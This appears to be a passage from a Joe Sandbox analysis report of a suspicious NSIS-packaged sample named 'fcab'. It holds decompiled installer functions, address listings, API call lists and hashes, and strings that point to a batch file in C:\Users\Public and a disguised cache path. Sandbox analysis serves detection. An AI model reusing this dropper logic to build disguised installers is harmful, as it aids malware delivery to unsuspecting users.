							__eflags = _v44 & 0x00000001;
							 *0x42a214 = _t94;
							 *0x42a21c =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x42a220 =  *0x42a220 + 1;
								__eflags =  *0x42a220;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405CF9(0x42a240, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E004032F5( *0x40ce98);
					_t65 = E004032DF( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x42a218) & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E004032DF(0x418ea8, _t90);
						__eflags = _t71;
						if(_t71 == 0) {
							E00402E5D(1);
							L29:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x42a218;
						if( *0x42a218 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402E5D(0);
							}
							goto L20;
						}
						E00405CF9( &_v44, 0x418ea8, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x40ce98; // 0x54265
						 *0x42a2c0 =  *0x42a2c0 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x42a218 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t24 = _t80 - 4; // 0x40a2dc
							_t93 = _t24;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x418ea4; // 0x54269
						if(__eflags < 0) {
							_v12 = E00406719(_v12, 0x418ea8, _t90);
						}
						 *0x40ce98 =  *0x40ce98 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 > 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}






























                                                          0x00402ec9
                                                          0x00402ecc
                                                          0x00402ecf
                                                          0x00402ee9
                                                          0x00402eee
                                                          0x00402f01
                                                          0x00402f06
                                                          0x00402f09
                                                          0x00402f0f
                                                          0x00000000
                                                          0x00402f11
                                                          0x00402f1c
                                                          0x00402f22
                                                          0x00402f33
                                                          0x00402f3a
                                                          0x00402f40
                                                          0x00402f42
                                                          0x00402f47
                                                          0x00402f49
                                                          0x00403036
                                                          0x00403038
                                                          0x0040303d
                                                          0x00403044
                                                          0x00000000
                                                          0x00000000
                                                          0x00403046
                                                          0x00403049
                                                          0x0040306d
                                                          0x00403072
                                                          0x00403078
                                                          0x00403083
                                                          0x00403088
                                                          0x0040308b
                                                          0x0040308c
                                                          0x0040308d
                                                          0x0040308f
                                                          0x00403094
                                                          0x00403097
                                                          0x004030aa
                                                          0x004030ae
                                                          0x004030b6
                                                          0x004030bb
                                                          0x004030bd
                                                          0x004030bd
                                                          0x004030bd
                                                          0x004030c5
                                                          0x004030c5
                                                          0x004030c8
                                                          0x004030c9
                                                          0x004030c9
                                                          0x004030cc
                                                          0x004030ce
                                                          0x004030ce
                                                          0x004030ce
                                                          0x004030d8
                                                          0x004030de
                                                          0x004030ec
                                                          0x004030f1
                                                          0x00000000
                                                          0x004030f1
                                                          0x00000000
                                                          0x00403097
                                                          0x00403051
                                                          0x0040305c
                                                          0x00403061
                                                          0x00403063
                                                          0x00000000
                                                          0x00000000
                                                          0x00403068
                                                          0x0040306b
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00402f4f
                                                          0x00402f54
                                                          0x00402f59
                                                          0x00402f5d
                                                          0x00402f64
                                                          0x00402f69
                                                          0x00402f6b
                                                          0x00402f6d
                                                          0x00402f6d
                                                          0x00402f71
                                                          0x00402f76
                                                          0x00402f78
                                                          0x004030a2
                                                          0x00403099
                                                          0x00000000
                                                          0x00403099
                                                          0x00402f7e
                                                          0x00402f85
                                                          0x00403001
                                                          0x00403005
                                                          0x00403009
                                                          0x0040300e
                                                          0x00000000
                                                          0x00403005
                                                          0x00402f8e
                                                          0x00402f93
                                                          0x00402f96
                                                          0x00402f9b
                                                          0x00000000
                                                          0x00000000
                                                          0x00402f9d
                                                          0x00402fa4
                                                          0x00000000
                                                          0x00000000
                                                          0x00402fa6
                                                          0x00402fad
                                                          0x00000000
                                                          0x00000000
                                                          0x00402faf
                                                          0x00402fb6
                                                          0x00000000
                                                          0x00000000
                                                          0x00402fb8
                                                          0x00402fbf
                                                          0x00000000
                                                          0x00000000
                                                          0x00402fc1
                                                          0x00402fc7
                                                          0x00402fd0
                                                          0x00402fd6
                                                          0x00402fd9
                                                          0x00402fdb
                                                          0x00402fe1
                                                          0x00000000
                                                          0x00000000
                                                          0x00402fe7
                                                          0x00402feb
                                                          0x00402ff3
                                                          0x00402ff3
                                                          0x00402ff6
                                                          0x00402ff6
                                                          0x00402ff9
                                                          0x00402ffb
                                                          0x00402ffd
                                                          0x00402ffd
                                                          0x00000000
                                                          0x00402ffb
                                                          0x00402fed
                                                          0x00402ff1
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040300f
                                                          0x0040300f
                                                          0x00403015
                                                          0x00403021
                                                          0x00403021
                                                          0x00403024
                                                          0x0040302a
                                                          0x0040302c
                                                          0x0040302c
                                                          0x00403034
                                                          0x00403034
                                                          0x00000000
                                                          0x00403034

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00402ED2
                                                          • GetModuleFileNameW.KERNEL32(00000000,00438800,00000400,?,00000006,00000008,0000000A), ref: 00402EEE
                                                            • Part of subcall function 00405D3E: GetFileAttributesW.KERNELBASE(00438800,00402F01,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D42
                                                            • Part of subcall function 00405D3E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D64
                                                          • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\Public,C:\Users\Public,00438800,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F3A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                          • String ID: "C:\Users\Public\fcab.bat" $C:\Users\Public$C:\Users\user\AppData\Local\Temp\$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                          • API String ID: 4283519449-2082474470
                                                          • Opcode ID: f1834550daec702275e8430a9050beb8303241b1a1e67c97a0945f4f5965c092
                                                          • Instruction ID: c18f197c65803053ad6b90da34fb4f59cecbc903e05eff4d530fc012fb388881
                                                          • Opcode Fuzzy Hash: f1834550daec702275e8430a9050beb8303241b1a1e67c97a0945f4f5965c092
                                                          • Instruction Fuzzy Hash: 3E51F271A01205AFDB209F65DD85B9E7EA8EB04319F10407BF904B72D5CB788E818BAD
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040626E Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209stringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 436 40626e-406279 437 40627b-40628a 436->437 438 40628c-4062a2 436->438 437->438 439 4062a8-4062b5 438->439 440 4064ba-4064c0 438->440 439->440 443 4062bb-4062c2 439->443 441 4064c6-4064d1 440->441 442 4062c7-4062d4 440->442 444 4064d3-4064d7 call 40624c 441->444 445 4064dc-4064dd 441->445 442->441 446 4062da-4062e6 442->446 443->440 444->445 448 4064a7 446->448 449 4062ec-40632a 446->449 450 4064b5-4064b8 448->450 451 4064a9-4064b3 448->451 452 406330-40633b 449->452 453 40644a-40644e 449->453 450->440 451->440 454 406354 452->454 455 40633d-406342 452->455 456 406450-406456 453->456 457 406481-406485 453->457 461 40635b-406362 454->461 455->454 458 406344-406347 455->458 459 406466-406472 call 40624c 456->459 460 406458-406464 call 406193 456->460 462 406494-4064a5 lstrlenW 457->462 463 406487-40648f call 40626e 457->463 458->454 464 406349-40634c 458->464 474 406477-40647d 459->474 460->474 466 406364-406366 461->466 467 406367-406369 461->467 462->440 463->462 464->454 470 40634e-406352 464->470 466->467 472 4063a4-4063a7 467->472 473 40636b-406389 call 40611a 467->473 470->461 477 4063b7-4063ba 472->477 478 4063a9-4063b5 GetSystemDirectoryW 472->478 482 40638e-406392 473->482 474->462 476 40647f 474->476 483 406442-406448 call 4064e0 476->483 480 406425-406427 477->480 481 4063bc-4063ca GetWindowsDirectoryW 477->481 479 406429-40642d 478->479 479->483 488 40642f 479->488 480->479 485 4063cc-4063d6 480->485 481->480 486 406432-406435 482->486 487 406398-40639f call 40626e 482->487 483->462 490 4063f0-406406 SHGetSpecialFolderLocation 485->490 491 4063d8-4063db 485->491 486->483 493 406437-40643d lstrcatW 486->493 487->479 488->486 495 406421 490->495 496 406408-40641f SHGetPathFromIDListW CoTaskMemFree 490->496 491->490 494 4063dd-4063e4 491->494 493->483 498 4063ec-4063ee 494->498 495->480 496->479 496->495 498->479 498->490
                                                          C-Code - Quality: 72%
                                                          			E0040626E(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t43;
				WCHAR* _t44;
				signed char _t46;
				signed int _t47;
				signed int _t48;
				short _t58;
				short _t60;
				short _t62;
				void* _t70;
				signed int _t76;
				void* _t82;
				signed char _t83;
				short _t86;
				signed int _t96;
				void* _t102;
				short _t103;
				signed int _t106;
				signed int _t108;
				void* _t109;
				WCHAR* _t110;
				void* _t112;

				_t109 = __esi;
				_t102 = __edi;
				_t70 = __ebx;
				_t43 = _a8;
				if(_t43 < 0) {
					_t43 =  *( *0x4291dc - 4 + _t43 * 4);
				}
				_push(_t70);
				_push(_t109);
				_push(_t102);
				_t96 =  *0x42a258 + _t43 * 2;
				_t44 = 0x4281a0;
				_t110 = 0x4281a0;
				if(_a4 >= 0x4281a0 && _a4 - 0x4281a0 >> 1 < 0x800) {
					_t110 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t103 =  *_t96;
					if(_t103 == 0) {
						break;
					}
					__eflags = (_t110 - _t44 & 0xfffffffe) - 0x800;
					if((_t110 - _t44 & 0xfffffffe) >= 0x800) {
						break;
					}
					_t82 = 2;
					_t96 = _t96 + _t82;
					__eflags = _t103 - 4;
					_a8 = _t96;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t110 = _t103;
							_t110 = _t110 + _t82;
							__eflags = _t110;
						} else {
							 *_t110 =  *_t96;
							_t110 = _t110 + _t82;
							_t96 = _t96 + _t82;
						}
						continue;
					}
					_t83 =  *((intOrPtr*)(_t96 + 1));
					_t46 =  *_t96;
					_t47 = _t46 & 0x000000ff;
					_v8 = (_t83 & 0x0000007f) << 0x00000007 | _t46 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t47 | 0x00008000;
					_v24 = _t47;
					_t76 = _t83 & 0x000000ff;
					_v16 = _t76;
					__eflags = _t103 - 2;
					_v20 = _t76 | 0x00008000;
					if(_t103 != 2) {
						__eflags = _t103 - 3;
						if(_t103 != 3) {
							__eflags = _t103 - 1;
							if(_t103 == 1) {
								__eflags = (_t47 | 0xffffffff) - _v8;
								E0040626E(_t76, _t103, _t110, _t110, (_t47 | 0xffffffff) - _v8);
							}
							L43:
							_t48 = lstrlenW(_t110);
							_t96 = _a8;
							_t110 =  &(_t110[_t48]);
							_t44 = 0x4281a0;
							continue;
						}
						_t106 = _v8;
						__eflags = _t106 - 0x1d;
						if(_t106 != 0x1d) {
							__eflags = (_t106 << 0xb) + 0x42b000;
							E0040624C(_t110, (_t106 << 0xb) + 0x42b000);
						} else {
							E00406193(_t110,  *0x42a208);
						}
						__eflags = _t106 + 0xffffffeb - 7;
						if(_t106 + 0xffffffeb < 7) {
							L34:
							E004064E0(_t110);
						}
						goto L43;
					}
					_t86 =  *0x42a20c;
					__eflags = _t86;
					_t108 = 2;
					if(_t86 >= 0) {
						L13:
						_v8 = 1;
						L14:
						__eflags =  *0x42a2a4;
						if( *0x42a2a4 != 0) {
							_t108 = 4;
						}
						__eflags = _t47;
						if(__eflags >= 0) {
							__eflags = _t47 - 0x25;
							if(_t47 != 0x25) {
								__eflags = _t47 - 0x24;
								if(_t47 == 0x24) {
									GetWindowsDirectoryW(_t110, 0x400);
									_t108 = 0;
								}
								while(1) {
									__eflags = _t108;
									if(_t108 == 0) {
										goto L30;
									}
									_t58 =  *0x42a204;
									_t108 = _t108 - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										L26:
										_t60 = SHGetSpecialFolderLocation( *0x42a208,  *(_t112 + _t108 * 4 - 0x18),  &_v12);
										__eflags = _t60;
										if(_t60 != 0) {
											L28:
											 *_t110 =  *_t110 & 0x00000000;
											__eflags =  *_t110;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v12, _t110);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t60;
										if(_t60 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L26;
									}
									_t62 =  *_t58( *0x42a208,  *(_t112 + _t108 * 4 - 0x18), 0, 0, _t110); // executed
									__eflags = _t62;
									if(_t62 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryW(_t110, 0x400);
							goto L30;
						} else {
							E0040611A( *0x42a258, __eflags, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a258 + (_t47 & 0x0000003f) * 2, _t110, _t47 & 0x00000040); // executed
							__eflags =  *_t110;
							if( *_t110 != 0) {
								L32:
								__eflags = _t76 - 0x1a;
								if(_t76 == 0x1a) {
									lstrcatW(_t110, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L34;
							}
							E0040626E(_t76, _t108, _t110, _t110, _t76);
							L30:
							__eflags =  *_t110;
							if( *_t110 == 0) {
								goto L34;
							}
							_t76 = _v16;
							goto L32;
						}
					}
					__eflags = _t86 - 0x5a04;
					if(_t86 == 0x5a04) {
						goto L13;
					}
					__eflags = _t76 - 0x23;
					if(_t76 == 0x23) {
						goto L13;
					}
					__eflags = _t76 - 0x2e;
					if(_t76 == 0x2e) {
						goto L13;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L14;
					}
				}
				 *_t110 =  *_t110 & 0x00000000;
				if(_a4 == 0) {
					return _t44;
				}
				return E0040624C(_a4, _t44);
			}






























                                                          0x0040626e
                                                          0x0040626e
                                                          0x0040626e
                                                          0x00406274
                                                          0x00406279
                                                          0x0040628a
                                                          0x0040628a
                                                          0x00406292
                                                          0x00406293
                                                          0x00406294
                                                          0x00406295
                                                          0x00406298
                                                          0x004062a0
                                                          0x004062a2
                                                          0x004062bb
                                                          0x004062be
                                                          0x004062be
                                                          0x004064ba
                                                          0x004064ba
                                                          0x004064c0
                                                          0x00000000
                                                          0x00000000
                                                          0x004062ce
                                                          0x004062d4
                                                          0x00000000
                                                          0x00000000
                                                          0x004062dc
                                                          0x004062dd
                                                          0x004062df
                                                          0x004062e3
                                                          0x004062e6
                                                          0x004064a7
                                                          0x004064b5
                                                          0x004064b8
                                                          0x004064b8
                                                          0x004064a9
                                                          0x004064ac
                                                          0x004064af
                                                          0x004064b1
                                                          0x004064b1
                                                          0x00000000
                                                          0x004064a7
                                                          0x004062ec
                                                          0x004062ef
                                                          0x004062fe
                                                          0x00406305
                                                          0x0040630f
                                                          0x00406313
                                                          0x00406316
                                                          0x00406319
                                                          0x0040631e
                                                          0x00406323
                                                          0x00406327
                                                          0x0040632a
                                                          0x0040644a
                                                          0x0040644e
                                                          0x00406481
                                                          0x00406485
                                                          0x0040648a
                                                          0x0040648f
                                                          0x0040648f
                                                          0x00406494
                                                          0x00406495
                                                          0x0040649a
                                                          0x0040649d
                                                          0x004064a0
                                                          0x00000000
                                                          0x004064a0
                                                          0x00406450
                                                          0x00406453
                                                          0x00406456
                                                          0x0040646b
                                                          0x00406472
                                                          0x00406458
                                                          0x0040645f
                                                          0x0040645f
                                                          0x0040647a
                                                          0x0040647d
                                                          0x00406442
                                                          0x00406443
                                                          0x00406443
                                                          0x00000000
                                                          0x0040647d
                                                          0x00406330
                                                          0x00406338
                                                          0x0040633a
                                                          0x0040633b
                                                          0x00406354
                                                          0x00406354
                                                          0x0040635b
                                                          0x0040635b
                                                          0x00406362
                                                          0x00406366
                                                          0x00406366
                                                          0x00406367
                                                          0x00406369
                                                          0x004063a4
                                                          0x004063a7
                                                          0x004063b7
                                                          0x004063ba
                                                          0x004063c2
                                                          0x004063c8
                                                          0x004063c8
                                                          0x00406425
                                                          0x00406425
                                                          0x00406427
                                                          0x00000000
                                                          0x00000000
                                                          0x004063cc
                                                          0x004063d3
                                                          0x004063d4
                                                          0x004063d6
                                                          0x004063f0
                                                          0x004063fe
                                                          0x00406404
                                                          0x00406406
                                                          0x00406421
                                                          0x00406421
                                                          0x00406421
                                                          0x00000000
                                                          0x00406421
                                                          0x0040640c
                                                          0x00406417
                                                          0x0040641d
                                                          0x0040641f
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040641f
                                                          0x004063d8
                                                          0x004063db
                                                          0x00000000
                                                          0x00000000
                                                          0x004063ea
                                                          0x004063ec
                                                          0x004063ee
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004063ee
                                                          0x00000000
                                                          0x00406425
                                                          0x004063af
                                                          0x00000000
                                                          0x0040636b
                                                          0x00406389
                                                          0x0040638e
                                                          0x00406392
                                                          0x00406432
                                                          0x00406432
                                                          0x00406435
                                                          0x0040643d
                                                          0x0040643d
                                                          0x00000000
                                                          0x00406435
                                                          0x0040639a
                                                          0x00406429
                                                          0x00406429
                                                          0x0040642d
                                                          0x00000000
                                                          0x00000000
                                                          0x0040642f
                                                          0x00000000
                                                          0x0040642f
                                                          0x00406369
                                                          0x0040633d
                                                          0x00406342
                                                          0x00000000
                                                          0x00000000
                                                          0x00406344
                                                          0x00406347
                                                          0x00000000
                                                          0x00000000
                                                          0x00406349
                                                          0x0040634c
                                                          0x00000000
                                                          0x0040634e
                                                          0x0040634e
                                                          0x00000000
                                                          0x0040634e
                                                          0x0040634c
                                                          0x004064c6
                                                          0x004064d1
                                                          0x004064dd
                                                          0x004064dd
                                                          0x00000000

                                                          APIs
                                                          • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004063AF
                                                          • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp\System.dll,?,004052E7,Skipped: C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp\System.dll,00000000), ref: 004063C2
                                                          • SHGetSpecialFolderLocation.SHELL32(004052E7,00410EA0,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp\System.dll,?,004052E7,Skipped: C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp\System.dll,00000000), ref: 004063FE
                                                          • SHGetPathFromIDListW.SHELL32(00410EA0,Call), ref: 0040640C
                                                          • CoTaskMemFree.OLE32(00410EA0), ref: 00406417
                                                          • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040643D
                                                          • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp\System.dll,?,004052E7,Skipped: C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp\System.dll,00000000), ref: 00406495
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                          • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                          • API String ID: 717251189-3682884805
                                                          • Opcode ID: 5ac7d34cae972a88d7e271cc5c0f960f95d4283ece9e7c17a9ddda12c5cbf51a
                                                          • Instruction ID: 1d846ac168704965e63d6b1540e117b92082746421250facdf4000baa2e8fd31
                                                          • Opcode Fuzzy Hash: 5ac7d34cae972a88d7e271cc5c0f960f95d4283ece9e7c17a9ddda12c5cbf51a
                                                          • Instruction Fuzzy Hash: 8F610E71A00105ABDF249F64CC40AAE37A9EF50314F62813FE943BA2D0D77D49A2C79E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          C-Code - Quality: 61%
                                                          			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __edi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				void* _t81;
				void* _t82;
				WCHAR* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402C37(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x28) & 0x00000007;
				_t35 = E00405B94( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t84 = L"Call";
				if(_t35 == 0) {
					lstrcatW(E00405B1D(E0040624C(_t84, L"C:\\Users\\hardz\\AppData\\Local\\Microsoft\\Windows\\INetCache\\spilplatform\\Thenceforth")), ??);
				} else {
					E0040624C();
				}
				E004064E0(_t84);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E0040658F(_t84);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x1c);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00405D19(_t84);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E00405D3E(_t84, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x30) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E004052B0(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x42a2a8;
						goto L32;
					} else {
						E0040624C("C:\Users\hardz\AppData\Local\Temp\nsjD2A6.tmp", _t81);
						E0040624C(_t81, _t84);
						E0040626E(_t77, _t81, _t84, "C:\Users\hardz\AppData\Local\Temp\nsjD2A6.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x14)));
						E0040624C(_t81, "C:\Users\hardz\AppData\Local\Temp\nsjD2A6.tmp");
						_t64 = E004058AE("C:\Users\hardz\AppData\Local\Temp\nsjD2A6.tmp\System.dll",  *(_t86 - 0x28) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x42a2a8 =  &( *0x42a2a8->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t84);
								_push(0xfffffffa);
								E004052B0();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E004052B0(0xffffffea,  *(_t86 - 8)); // executed
				 *0x42a2d4 =  *0x42a2d4 + 1;
				_push(_t77);
				_push(_t77);
				_push( *(_t86 - 0x30));
				_push( *((intOrPtr*)(_t86 - 0x20)));
				_t45 = E004030FA(); // executed
				 *0x42a2d4 =  *0x42a2d4 - 1;
				__eflags =  *(_t86 - 0x1c) - 0xffffffff;
				_t82 = _t45;
				if( *(_t86 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x30), _t86 - 0x1c, _t77, _t86 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t86 - 0x30)); // executed
				__eflags = _t82 - _t77;
				if(_t82 >= _t77) {
					goto L31;
				} else {
					__eflags = _t82 - 0xfffffffe;
					if(_t82 != 0xfffffffe) {
						E0040626E(_t77, _t82, _t84, _t84, 0xffffffee);
					} else {
						E0040626E(_t77, _t82, _t84, _t84, 0xffffffe9);
						lstrcatW(_t84,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t84);
					E004058AE();
					goto L29;
				}
				goto L33;
			}


















                                                          0x0040176f
                                                          0x00401776
                                                          0x00401782
